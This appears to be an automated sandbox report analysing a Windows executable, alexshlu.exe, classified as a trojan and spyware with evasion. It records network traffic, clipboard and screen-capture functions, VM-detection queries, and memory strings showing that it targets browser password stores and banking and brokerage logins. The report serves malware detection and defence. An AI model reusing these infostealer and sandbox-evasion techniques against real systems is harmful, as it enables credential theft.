                Source: alexshlu.exe, 00000003.00000003.1529377207.0000000003528000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529199963.000000000352B000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529270353.0000000003528000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: alexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: alexshlu.exe, 00000003.00000003.1529377207.0000000003528000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529199963.000000000352B000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529270353.0000000003528000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                Source: alexshlu.exe, 00000003.00000003.1476674345.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.comHI2
                Source: alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                Source: alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                Source: alexshlu.exe, 00000003.00000003.1609117324.00000000035FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                Source: alexshlu.exe, 00000003.00000003.1609220506.0000000003814000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
                Source: alexshlu.exe, 00000003.00000003.1609220506.0000000003814000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
                Source: alexshlu.exe, 00000003.00000003.1609220506.0000000003814000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: alexshlu.exe, 00000003.00000003.1609220506.0000000003814000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                Source: alexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                Source: alexshlu.exe, 00000003.00000003.1754962264.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown | HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49714 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49715 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49716 version: TLS 1.2
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00431A30 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard | 3_2_00431A30
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00431BB0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt | 3_2_00431BB0
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 0_2_002A7AF0 | 0_2_002A7AF0
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 0_2_002A1B70 | 0_2_002A1B70
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 0_2_002A1000 | 0_2_002A1000
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 0_2_002B2101 | 0_2_002B2101
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 0_2_002B8900 | 0_2_002B8900
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 0_2_002C6362 | 0_2_002C6362
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 0_2_002A4C00 | 0_2_002A4C00
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 0_2_002AD4DB | 0_2_002AD4DB
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 0_2_002B3500 | 0_2_002B3500
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 0_2_002A6D70 | 0_2_002A6D70
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 0_2_002C458A | 0_2_002C458A
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 0_2_002A3E60 | 0_2_002A3E60
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_002A1000 | 3_2_002A1000
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_002B2101 | 3_2_002B2101
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_002B8900 | 3_2_002B8900
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_002A7AF0 | 3_2_002A7AF0
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_002C6362 | 3_2_002C6362
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_002A1B70 | 3_2_002A1B70
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_002A4C00 | 3_2_002A4C00
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_002AD4DB | 3_2_002AD4DB
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_002B3500 | 3_2_002B3500
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_002A6D70 | 3_2_002A6D70
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_002C458A | 3_2_002C458A
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_002A3E60 | 3_2_002A3E60
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_0040A960 | 3_2_0040A960
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00426170 | 3_2_00426170
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_0040E2A9 | 3_2_0040E2A9
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00416B7E | 3_2_00416B7E
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00439B90 | 3_2_00439B90
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_004233A0 | 3_2_004233A0
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00436C40 | 3_2_00436C40
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_0043DCF0 | 3_2_0043DCF0
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_004215F0 | 3_2_004215F0
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_0042C6D7 | 3_2_0042C6D7
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_0043E690 | 3_2_0043E690
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_0042BFD3 | 3_2_0042BFD3
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00410FD6 | 3_2_00410FD6
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_0042BFDA | 3_2_0042BFDA
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_004087F0 | 3_2_004087F0
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00436F90 | 3_2_00436F90
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_004097B0 | 3_2_004097B0
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00425F7D | 3_2_00425F7D
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00409070 | 3_2_00409070
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_0043A030 | 3_2_0043A030
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_004038C0 | 3_2_004038C0
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_004380D9 | 3_2_004380D9
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_0041D8E0 | 3_2_0041D8E0
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_0042D085 | 3_2_0042D085
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_004280B0 | 3_2_004280B0
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_0042297F | 3_2_0042297F
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_0042A100 | 3_2_0042A100
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00437900 | 3_2_00437900
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00416E97 | 3_2_00416E97
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00405910 | 3_2_00405910
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00425920 | 3_2_00425920
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_004301D0 | 3_2_004301D0
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_004081F0 | 3_2_004081F0
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00408990 | 3_2_00408990
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00417190 | 3_2_00417190
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00414A40 | 3_2_00414A40
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_0041BA48 | 3_2_0041BA48
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_0040CA54 | 3_2_0040CA54
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00404270 | 3_2_00404270
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00422270 | 3_2_00422270
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00406200 | 3_2_00406200
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00423A00 | 3_2_00423A00
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_0043CAC0 | 3_2_0043CAC0
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_0043E2C0 | 3_2_0043E2C0
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_004292D0 | 3_2_004292D0
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00415ADC | 3_2_00415ADC
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_0042BA8D | 3_2_0042BA8D
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_004192BA | 3_2_004192BA
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_0040B351 | 3_2_0040B351
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_0041CB5A | 3_2_0041CB5A
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00409360 | 3_2_00409360
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_0041C360 | 3_2_0041C360
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00411B1B | 3_2_00411B1B
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_0043533A | 3_2_0043533A
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_0043CBD6 | 3_2_0043CBD6
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_0043A3F0 | 3_2_0043A3F0
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00404BA0 | 3_2_00404BA0
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_0040D44C | 3_2_0040D44C
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00434C4D | 3_2_00434C4D
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00407470 | 3_2_00407470
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00419C10 | 3_2_00419C10
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00418C1E | 3_2_00418C1E
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_0041D420 | 3_2_0041D420
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_0041DC20 | 3_2_0041DC20
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00436430 | 3_2_00436430
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_0043CAC0 | 3_2_0043CAC0
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_0043CCE0 | 3_2_0043CCE0
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00422CF8 | 3_2_00422CF8
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00427C9D | 3_2_00427C9D
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_0043CD60 | 3_2_0043CD60
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00416571 | 3_2_00416571
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00424D70 | 3_2_00424D70
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00423D30 | 3_2_00423D30
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_0041DE40 | 3_2_0041DE40
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00423E4B | 3_2_00423E4B
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00405E60 | 3_2_00405E60
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00412670 | 3_2_00412670
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00425670 | 3_2_00425670
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_0041AE00 | 3_2_0041AE00
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_0043CE00 | 3_2_0043CE00
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00423E30 | 3_2_00423E30
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_004156D0 | 3_2_004156D0
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00415EE0 | 3_2_00415EE0
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_004266E7 | 3_2_004266E7
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00406690 | 3_2_00406690
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00436690 | 3_2_00436690
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00416E97 | 3_2_00416E97
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00402EA0 | 3_2_00402EA0
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_004376B0 | 3_2_004376B0
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00426EBE | 3_2_00426EBE
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00428F5D | 3_2_00428F5D
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_0042B763 | 3_2_0042B763
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00425F7D | 3_2_00425F7D
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00414F08 | 3_2_00414F08
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00420717 | 3_2_00420717
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00418731 | 3_2_00418731
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_0041EF30 | 3_2_0041EF30
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_004167A5 | 3_2_004167A5
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00418FAD | 3_2_00418FAD
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_0043DFB0 | 3_2_0043DFB0
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: String function: 00414A30 appears 76 times
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: String function: 002B6C0B appears 42 times
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: String function: 00408000 appears 52 times
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: String function: 002BB97D appears 40 times
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: String function: 002AD9E0 appears 102 times
Source: alexshlu.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: alexshlu.exe | Static PE information: Section: .bss ZLIB complexity 1.0003383629931388
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@4/0@11/2
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00436F90 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW | 3_2_00436F90
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7628:120:WilError_03
Source: alexshlu.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\alexshlu.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: alexshlu.exe, 00000003.00000003.1530567050.00000000034FA000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1565708223.00000000034F6000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1565708223.0000000003590000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529856138.0000000003516000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: alexshlu.exe | ReversingLabs: Detection: 73%
Source: alexshlu.exe | Virustotal: Detection: 75%
Source: C:\Users\user\Desktop\alexshlu.exe | File read: C:\Users\user\Desktop\alexshlu.exe
Source: unknown | Process created: C:\Users\user\Desktop\alexshlu.exe "C:\Users\user\Desktop\alexshlu.exe"
Source: C:\Users\user\Desktop\alexshlu.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\alexshlu.exe | Process created: C:\Users\user\Desktop\alexshlu.exe "C:\Users\user\Desktop\alexshlu.exe"
Source: C:\Users\user\Desktop\alexshlu.exe | Process created: C:\Users\user\Desktop\alexshlu.exe "C:\Users\user\Desktop\alexshlu.exe"
Source: C:\Users\user\Desktop\alexshlu.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\alexshlu.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\alexshlu.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\alexshlu.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\alexshlu.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\alexshlu.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\alexshlu.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\alexshlu.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\alexshlu.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\alexshlu.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\alexshlu.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\alexshlu.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\alexshlu.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\alexshlu.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\alexshlu.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\alexshlu.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\alexshlu.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\alexshlu.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\alexshlu.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\alexshlu.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\alexshlu.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\alexshlu.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\alexshlu.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\alexshlu.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\alexshlu.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\alexshlu.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\alexshlu.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\alexshlu.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\alexshlu.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\alexshlu.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\alexshlu.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\alexshlu.exe | Section loaded: ondemandconnroutehelper.dll
Source: alexshlu.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
Source: alexshlu.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: alexshlu.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: alexshlu.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: alexshlu.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: alexshlu.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 0_2_002ADB9A push ecx; ret | 0_2_002ADBAD
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_002ADB9A push ecx; ret | 3_2_002ADBAD
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00446061 push edx; retf | 3_2_00446062
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_0043CA60 push eax; mov dword ptr [esp], 11102FFEh | 3_2_0043CA63
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00445A2E push esi; ret | 3_2_00445A31
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00442543 push esp; retf | 3_2_00442549
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00446EA4 push edi; iretd | 3_2_00446EA5
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00439F70 push eax; mov dword ptr [esp], 60616263h | 3_2_00439F7F
Source: C:\Users\user\Desktop\alexshlu.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\alexshlu.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exe TID: 7736Thread sleep time: -270000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exe TID: 7736Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 0_2_002C0868 FindFirstFileExW,0_2_002C0868
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 0_2_002C0919 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_002C0919
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_002C0868 FindFirstFileExW,3_2_002C0868
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_002C0919 FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_002C0919
                Source: alexshlu.exe, 00000003.00000003.1565346772.0000000003593000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696494690p
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
